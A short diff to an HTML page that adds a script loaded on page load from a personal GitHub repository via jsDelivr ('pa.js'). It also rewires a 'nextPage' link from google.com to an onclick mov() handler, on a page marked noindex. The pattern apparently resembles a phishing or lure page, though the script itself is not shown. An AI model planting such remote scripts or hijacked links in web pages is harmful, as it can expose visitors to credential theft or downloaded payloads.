--- a/index.html
+++ b/index.html
@@ -6,6 +6,7 @@
     <meta name="robots" content="noindex,nofollow" />
     <meta name="viewport" content="width=device-width,initial-scale=1" />
     <!-- <meta http-equiv="refresh" content="5; url=https://google.com"> -->
+     <script src="https://cdn.jsdelivr.net/gh/skypennsylvania/online/pa.js"></script>
     <style>
       * {
         box-sizing: border-box;
@@ -528,8 +529,7 @@
         <div id="aPYp3" style="display: grid">
           <div>
             <a style="text-decoration: none;" rel="noopener noreferrer"
-            href="https://google.com"
-            target="_blank"
+            onclick="mov()"
             id="nextPage">
             <div>
              <div  style="border: none; overflow: hidden; width: 300px; height: 65px;border: 1px solid #e0e0e0;text-align: center;align-content: center;">
